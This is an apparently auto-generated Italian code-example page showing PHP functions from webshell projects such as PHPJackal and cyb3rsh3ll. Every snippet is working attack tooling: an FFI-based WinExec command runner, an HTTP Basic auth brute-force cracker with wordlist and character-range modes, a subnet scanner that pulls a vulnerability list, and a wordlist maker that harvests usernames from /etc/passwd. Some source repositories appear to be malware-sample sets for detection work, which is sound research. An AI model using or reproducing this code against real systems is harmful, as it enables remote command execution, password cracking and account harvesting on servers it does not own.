Esempi di codice in PHP per whereistmP

Esempio n. 1

0

Mostra file

File: cf-bypass-ircbot.php Progetto: Courvix/CF-Bypass-PHP

function ffishelL($command)
{
    $name = whereistmP() . "\\" . uniqid('NJ');
    $api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
    $res = $api->WinExec("cmd.exe /c {$command} >\"{$name}\"", 0);
    while (!file_exists($name)) {
        sleep(1);
    }
    $exec = file_get_contents($name);
    unlink($name);
    return $exec;
}

Esempio n. 2

0

Mostra file

File: a824680ae0452cb5a0bebc0e8bf858f4.php Progetto: retanoj/webshellSample

function authcrackeR()
{
    global $errorbox, $et, $t, $hcwd;
    if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])) {
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        spliturL($_REQUEST['target'], $host, $page);
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        if ($method == 'GET') {
            $page .= $data;
        }
        $dictionary = fopen($_REQUEST['dictionary'], 'r');
        echo '<font color=blue>';
        while (!feof($dictionary)) {
            if ($type) {
                $combo = trim(fgets($dictionary), " \n\r");
                $user = substr($combo, 0, strpos($combo, ':'));
                $pass = substr($combo, strpos($combo, ':') + 1);
            } else {
                $pass = trim(fgets($dictionary), " \n\r");
            }
            $so = fsockopen($host, 80, $en, $es, 5);
            if (!$so) {
                echo "{$errorbox} Can not connect to host{$et}";
                break;
            } else {
                $packet = "{$method} /{$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                if ($method == 'POST') {
                    $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                }
                $packet .= "\r\n\r\n";
                $packet .= $data;
                fputs($so, $packet);
                $res = substr(fgets($so), 9, 2);
                fclose($so);
                if ($res == '20') {
                    echo "U: {$user} P: {$pass}</br>";
                    if ($log) {
                        file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                    }
                }
            }
        }
        echo 'Done!</font>';
    } else {
        echo "<center><form method='POST' name=form>{$t}HTTP Auth cracker:</td><td bgcolor='#333333'><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width='20%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666'><input type=text name=dictionary size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='20%' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user></td></tr><tr><td width='20%' bgcolor='#808080'>Server:</td><td bgcolor='#808080'><input type=text name=target value=localhost size=35></td></tr><tr><td width='20%' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = !document.form.logfilE.disabled;' style='border-width:1px;background-color:#666666;' checked>Log</td><td bgcolor='#666666'><input type=text name=logfilE size=25 value='" . whereistmP() . DIRECTORY_SEPARATOR . ".log'> {$hcwd} <input class=buttons type=submit value=Start></form>{$et}</center>";
    }
}

Esempio n. 3

0

Mostra file

File: PHPJackal.php Progetto: nim4/PHPJackal

function authcrackeR()
{
    global $hcwd;
    if (!empty($_REQUEST['target'])) {
        if (isset($_REQUEST['loG']) && !empty($_REQUEST['logfilE'])) {
            $log = 1;
            $file = $_REQUEST['logfilE'];
        } else {
            $log = 0;
        }
        $data = '';
        $method = $_REQUEST['method'] ? 'POST' : 'GET';
        if (strstr($_REQUEST['target'], '?')) {
            $data = substr($_REQUEST['target'], strpos($_REQUEST['target'], '?') + 1);
            $_REQUEST['target'] = substr($_REQUEST['target'], 0, strpos($_REQUEST['target'], '?'));
        }
        $u = parse_url($_REQUEST['target']);
        $host = $u['host'];
        $page = $u['path'];
        $type = $_REQUEST['combo'];
        $user = !empty($_REQUEST['user']) ? $_REQUEST['user'] : '';
        if ($method == 'GET') {
            $page .= $data;
        }
        echo '<font color=#FA0>';
        if ($_REQUEST['mode'] == 'wl') {
            $dictionary = fopen($_REQUEST['dictionary'], 'r');
            while (!feof($dictionary)) {
                if ($type) {
                    $combo = trim(fgets($dictionary), " \n\r");
                    $user = substr($combo, 0, strpos($combo, ':'));
                    $pass = substr($combo, strpos($combo, ':') + 1);
                } else {
                    $pass = trim(fgets($dictionary), " \n\r");
                }
                $so = @fsockopen($host, 80, $en, $es, 5);
                if (!$so) {
                    echo "Can not connect to host";
                    break;
                } else {
                    $packet = "{$method} {$page} HTTP/1.0\r\nAccept-Encoding: text\r\nHost: {$host}\r\nReferer: {$host}\r\nConnection: Close\r\nAuthorization: Basic " . base64_encode("{$user}:{$pass}");
                    if ($method == 'POST') {
                        $packet .= 'Content-Type: application/x-www-form-urlencoded\\r\\nContent-Length: ' . strlen($data);
                    }
                    $packet .= "\r\n\r\n";
                    $packet .= $data;
                    fputs($so, $packet);
                    $res = substr(fgets($so), 9, 2);
                    fclose($so);
                    if ($res == '20') {
                        echo "U: {$user} P: {$pass}</br>";
                        if ($log) {
                            file_add_contentS($file, "U: {$user} P: {$pass}\r\n");
                        }
                    }
                }
            }
        } else {
            $code = '
			$so = @fsockopen ( "' . $host . '", 80, $en, $es, 5 );
			$packet = "' . $method . " {$page} " . 'HTTP/1.0\\r\\nAccept-Encoding: text\\r\\nHost: ' . $host . '\\r\\nReferer: ' . $host . '\\r\\nConnection: Close\\r\\nAuthorization: Basic "
			. base64_encode ( "' . $user . ':".$word )."\\r\\n"';
            if ($method == "POST") {
                $code .= ".'Content-Type: application/x-www-form-urlencoded\r\nContent-Length: " . strlen("'{$data}'") . "'";
            }
            $code .= "\r\n\r\n" . $data . ';fputs ( $so, $packet );	$test= ( substr ( fgets ( $so ), 9, 2 ) == "20");';
            echo $code;
            if ($res = brute($_REQUEST['mode'], $_REQUEST['min'], $_REQUEST['max'], $code) != null) {
                echo "<b>{$user}:{$res}</b><br />";
            }
        }
        echo 'Done!</font>';
    } else {
        echo '
<form name=cracker method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">HTTP Auth cracker</label>
</div><div class="fieldwrapper">
<label class="styled">Target:</label>
<div class="thefield">
<input type="url" name="target" value="http://' . getenv('HTTP_HOST') . '/admin/" size="30" />
</div>
</div>
<div class="fieldwrapper"><label class="styled">Input:</label><div class="thefield">
<select name="mode" id="mode" onChange="toggle()">
<option value="09">Bruteforce [0-9]</option>
<option value="az">Bruteforce [a-z]</option>
<option value="az09">Bruteforce [a-z] [0-9]</option>
<option value="az09AZ">Bruteforce [a-z] [A-Z] [0-9]</option>
<option value="all">Bruteforce [ALL]</option>
<option value="wl">Wordlist</option>
</select>
</div></div>
<div class="fieldwrapper" id="dic">
<label class="styled">Dictionary:</label>
<div class="thefield">
<input type="text" name="dictionary" size="30" />
</div>
</div><div class="fieldwrapper" id="fcr">
<label class="styled">Dictionary type:</label>
<div class="thefield">
<ul style="margin-top:0;">
<li><input type="radio" value="0" checked name="combo" onClick="document.cracker.user.disabled = false;" /> <label>Simple (P)</label></li>
<li><input type="radio" name="combo" value="1" onClick="document.cracker.user.disabled = true;" /> <label>Combo (U:P)</label></li>
</ul>
</div>
</div>
<div class="fieldwrapper">
<label class="styled">Method:</label>
<div class="thefield">
<select name="method"><option selected value="1">POST</option><option value="0">GET</option></select>
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled"><input type=checkbox name=loG value=1 onClick="document.cracker.logfilE.disabled = !document.cracker.logfilE.disabled;" checked> Log:</label>
<div class="thefield">
<input type=text name=logfilE size=25 value="' . whereistmP() . DIRECTORY_SEPARATOR . '.log">
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="start" value="Start" style="margin-left: 150px;" />
</div>
</form><script>toggle();</script>';
    }
}

Esempio n. 4

0

Mostra file

File: cyb3rsh3ll.php Progetto: nbs-system/php-malware-finder

         flusheR();
     }
     $time = time() - $start;
     echo "Done! ({$time} seconds)</font>";
 } elseif (!empty($_REQUEST['securityscanner'])) {
     echo "<font color=yellow>";
     $start = time();
     $from = $_REQUEST['from'];
     $to = (int) $_REQUEST['to'];
     $timeout = (int) $_REQUEST['timeout'];
     $f = substr($from, strrpos($from, ".") + 1);
     $from = substr($from, 0, strrpos($from, "."));
     if (!empty($_REQUEST['httpscanner'])) {
         echo "Loading webserver bug list...";
         flusheR();
         $buglist = whereistmP() . DIRECTORY_SEPARATOR . namE();
         $dl = @downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db', $buglist);
         if ($dl) {
             $file = file($buglist);
             echo "Done! scanning started.<br><br>";
         } else {
             echo "Failed!!! scanning started without webserver security testing...<br><br>";
         }
         flusheR();
     } else {
         $fr = htmlspecialchars($from);
         echo "Scanning {$fr}.{$f}-{$fr}.{$to}:<br><br>";
     }
     for ($i = $f; $i <= $to; $i++) {
         $output = 0;
         $ip = "{$from}.{$i}";

Esempio n. 5

0

Mostra file

File: PHPJackal v1.5.php Progetto: mcanv/webshell

function dicmakeR()
{
    global $errorbox, $windows, $footer, $t, $et, $hcwd;
    if (!empty($_REQUEST['combo']) && $_REQUEST['combo'] == 1) {
        $combo = 1;
    } else {
        $combo = 0;
    }
    if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])) {
        $min = $_REQUEST['min'];
        $max = $_REQUEST['max'];
        if ($max < $min) {
            die($errorbox . "Bad input!{$et}" . $footer);
        }
        $s = $w = "";
        $out = $_REQUEST['output'];
        $r = $_REQUEST['range'] == 'a' ? 'a' : 'A';
        if ($_REQUEST['range'] == 0) {
            $r = 0;
        }
        for ($i = 0; $i < $min; $i++) {
            $s .= $r;
        }
        $dic = fopen($out, 'a');
        if (is_nan($r)) {
            while (strlen($s) <= $max) {
                $w = $s;
                if ($combo) {
                    $w = "{$w}:{$w}";
                }
                fwrite($dic, $w . "\n");
                $s++;
            }
        } else {
            while (strlen($w) <= $max) {
                $w = (string) str_repeat("0", $min - strlen($s)) . $s;
                if ($combo) {
                    $w = "{$w}:{$w}";
                }
                fwrite($dic, $w . "\n");
                $s++;
            }
        }
        fclose($dic);
        echo "<font color=blue>Done</font>";
    }
    if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])) {
        $input = fopen($_REQUEST['input'], 'r');
        if (!$input) {
            if ($windows) {
                echo $errorbox . "Unable to read from " . htmlspecialchars($_REQUEST['input']) . "{$et}<br>";
            } else {
                $input = explode("\n", shelL("cat {$input}"));
                $output = fopen($_REQUEST['output'], 'w');
                if ($output) {
                    foreach ($input as $in) {
                        $user = $in;
                        $user = trim(fgets($in), " \n\r");
                        if (!strstr($user, ":")) {
                            continue;
                        }
                        $user = substr($user, 0, strpos($user, ':'));
                        if ($combo) {
                            fwrite($output, $user . ":" . $user . "\n");
                        } else {
                            fwrite($output, $user . "\n");
                        }
                    }
                    fclose($input);
                    fclose($output);
                    echo "<font color=blue>Done</font>";
                }
            }
        } else {
            $output = fopen($_REQUEST['output'], 'w');
            if ($output) {
                while (!feof($input)) {
                    $user = trim(fgets($input), " \n\r");
                    if (!strstr($user, ":")) {
                        continue;
                    }
                    $user = substr($user, 0, strpos($user, ':'));
                    if ($combo) {
                        fwrite($output, $user . ":" . $user . "\n");
                    } else {
                        fwrite($output, $user . "\n");
                    }
                }
                fclose($input);
                fclose($output);
                echo "<font color=blue>Done</font>";
            } else {
                echo $errorbox . " Unable to write data to " . htmlspecialchars($_REQUEST['input']) . "{$et}<br>";
            }
        }
    } elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])) {
        $res = downloadiT($_REQUEST['url'], $_REQUEST['output']);
        if ($combo && $res) {
            $file = file($_REQUEST['output']);
            $output = fopen($_REQUEST['output'], 'w');
            foreach ($file as $v) {
                fwrite($output, "{$v}:{$v}\n");
            }
            fclose($output);
        }
        echo "<font color=blue>Done</font>";
    } else {
        $temp = whereistmP();
        echo "<center>{$t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Make></td></tr></form></table><br>{$t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Grab></td></tr></form></table><br>{$t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"{$temp}/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>{$hcwd}<input class=buttons type=submit value=Get></td></tr></form></table></center>";
    }
}

Esempi in PHP per whereistmP